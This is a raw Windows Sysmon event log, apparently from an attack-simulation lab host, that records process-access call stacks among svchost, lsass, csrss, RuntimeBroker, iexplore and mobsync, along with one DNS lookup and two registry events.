13:58:38.195{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013197Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.179{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013196Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.164{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013195Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.148{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013194Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.148{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+1158a|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000013193Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.148{59A5CD1D-93F9-6005-F104-00000000A301}45405152C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-93F9-6005-F304-00000000A301}5116C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\TokenBroker.dll+22ee6|C:\Windows\System32\TokenBroker.dll+114b3|C:\Windows\System32\TokenBroker.dll+d335|C:\Windows\System32\TokenBroker.dll+d669|C:\Windows\System32\TokenBroker.dll+1ff53|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e0cc|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000013192Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.132{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E46-6005-1600-00000000A301}1544C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x800000000000000013191Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:35.121{59A5CD1D-8E56-6005-2E00-00000000A301}246442.23.48.23.in-addr.arpa.0type: 12 a23-48-23-42.deploy.static.akamaitechnologies.com;C:\Windows\sysmon64.exe 10341000x800000000000000013190Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.008{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\ncbservice.dll+86ee|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013189Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:38.008{59A5CD1D-8E46-6005-1200-00000000A301}12124376C:\Windows\System32\svchost.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|c:\windows\system32\ncbservice.dll+86c0|c:\windows\system32\ncbservice.dll+6753|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.804{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.804{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.726{59A5CD1D-940F-6005-0C05-00000000A301}64766480C:\Program Files\Internet Explorer\iexplore.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\IEFRAME.dll+15755|C:\Windows\SYSTEM32\IEFRAME.dll+156d3|C:\Windows\SYSTEM32\IEFRAME.dll+1564d|C:\Windows\SYSTEM32\IEFRAME.dll+1545e|C:\Windows\SYSTEM32\IEFRAME.dll+2a8230|C:\Windows\SYSTEM32\IEFRAME.dll+152534|C:\Windows\SYSTEM32\IEFRAME.dll+14ab1|C:\Windows\SYSTEM32\IEFRAME.dll+1525bf|C:\Program Files\Internet Explorer\iexplore.exe+14e9|C:\Program Files\Internet Explorer\iexplore.exe+1d77|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0C05-00000000A301}6476C:\Program Files\Internet Explorer\iexplore.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013232Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15442288C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013231Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.711{59A5CD1D-8E46-6005-1600-00000000A301}15441576C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013230Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.695{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013229Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.679{59A5CD1D-93F6-6005-E604-00000000A301}48886264C:\Windows\system32\csrss.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013228Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.679{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000013227Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.679{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-940F-6005-0D05-00000000A301}6496C:\Windows\System32\mobsync.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35af2|c:\windows\system32\rpcss.dll+3c90d|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000013226Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.492{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000013225Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.492{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1e1d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1f63|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+2945b|C:\Windows\System32\combase.dll+2a962|C:\Windows\System32\combase.dll+4fcf3|C:\Windows\System32\combase.dll+2ab6d|C:\Windows\System32\combase.dll+4e03f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751 10341000x800000000000000013224Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:39.492{59A5CD1D-93F9-6005-F104-00000000A301}45406168C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9407-6005-0A05-00000000A301}5312C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1535|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16ef|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a243|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7 13241300x800000000000000013223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDBSetValue2021-01-18 13:58:39.476{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Internet Explorer\iexplore.exeBinary Data 12241200x800000000000000013222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localInvDBDeleteValue2021-01-18 13:58:39.461{59A5CD1D-8E46-6005-1200-00000000A301}1212C:\Windows\System32\svchost.exeHKU\S-1-5-21-2311372046-1276363322-545193238-500\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store\C:\Program Files\Internet Explorer\iexplore.exe 10341000x800000000000000013221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 